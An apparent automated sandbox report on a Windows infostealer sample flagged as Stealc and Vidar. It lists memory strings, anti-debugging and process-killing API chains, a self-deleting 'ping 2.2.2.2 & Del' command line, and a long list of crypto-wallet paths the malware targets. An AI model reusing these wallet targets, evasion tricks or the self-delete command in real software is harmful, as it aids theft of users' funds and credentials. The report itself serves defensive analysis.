
Source: Amcache.hve.27.dr	Binary or memory string: VMware
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Web Data.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: Web Data.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: Web Data.10.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: Amcache.hve.27.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Web Data.10.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696492231x
Source: Web Data.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: Web Data.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: Web Data.10.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8RECOVE~11c3bankoRecoveryImprovedVMware20,11696492231x
Source: Amcache.hve.27.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Web Data.10.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.27.dr	Binary or memory string: vmci.sys
Source: Web Data.10.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: Web Data.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: Web Data.10.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: Web Data.10.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.27.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.27.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.27.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.27.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.27.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Web Data.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: RoamingEBFBKKJECA.exe, 00000015.00000002.1850175601.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: Amcache.hve.27.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.27.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Web Data.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.27.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.27.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.27.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.27.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Web Data.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Web Data.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Amcache.hve.27.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.27.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Web Data.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.27.dr	Binary or memory string: vmci.syshbin
Source: RoamingEBFBKKJECA.exe, 00000015.00000002.1850175601.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.27.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.27.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.27.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.27.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.27.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 00000008.00000003.1552946372.00001A3C00314000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: Web Data.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarer
Source: Amcache.hve.27.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: chrome.exe, 00000004.00000002.1600116038.00001B44006FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=46635ea7-d206-44e0-b36a-6d1b6a117ee6
Source: Amcache.hve.27.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.1548310257.0000028A7D2CB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000008.00000002.1599725857.00000208FFA44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Web Data.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: chrome.exe, 00000004.00000002.1600116038.00001B44006FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=46635ea7-d206-44e0-b36a-6d1b6a117ee6
Source: Amcache.hve.27.dr	Binary or memory string: vmci.syshbin`
Source: Web Data.10.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: Amcache.hve.27.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Web Data.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.27.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.27.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Web Data.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: chrome.exe, 00000004.00000002.1550723194.00001B4400290000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=46635ea7-d206-44e0-b36a-6d1b6a117ee6
Source: Web Data.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	API call chain: ExitProcess graph end node	graph_0-66753
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	API call chain: ExitProcess graph end node	graph_0-66771
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	API call chain: ExitProcess graph end node	graph_0-67929
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	API call chain: ExitProcess graph end node	graph_0-66750
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	API call chain: ExitProcess graph end node	graph_0-66764
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	API call chain: ExitProcess graph end node	graph_0-66772
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	API call chain: ExitProcess graph end node	graph_0-66793
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	API call chain: ExitProcess graph end node	graph_0-66592

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,

0_2_00404610

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041B058

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_0040A090

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]

0_2_00419AA0

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041B058
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0041D21A SetUnhandledExceptionFilter,	0_2_0041D21A
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041B63A
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D00AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D00AC62

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: DbMBWMxoNv.exe PID: 6456, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_004198E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00419790

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingEBFBKKJECA.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingEBFBKKJECA.exe "C:\Users\user\AppData\RoamingEBFBKKJECA.exe"
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\RoamingEBFBKKJECA.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_6D054760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6D054760

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_6CF31C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6CF31C30

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_6D00AE71 cpuid

0_2_6D00AE71

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00417D20

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Queries volume information: C:\Users\user\AppData\RoamingEBFBKKJECA.exe VolumeInformation

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00418CF0 GetSystemTime,

0_2_00418CF0

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004179E0

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00417BC0

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_6CF58390 NSS_GetVersion,

0_2_6CF58390

Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: Amcache.hve.27.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.27.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.27.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.27.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.27.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.DbMBWMxoNv.exe.2f60e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DbMBWMxoNv.exe.2f60e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DbMBWMxoNv.exe.48f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DbMBWMxoNv.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DbMBWMxoNv.exe.48f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1909388825.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DbMBWMxoNv.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: DbMBWMxoNv.exe PID: 6456, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
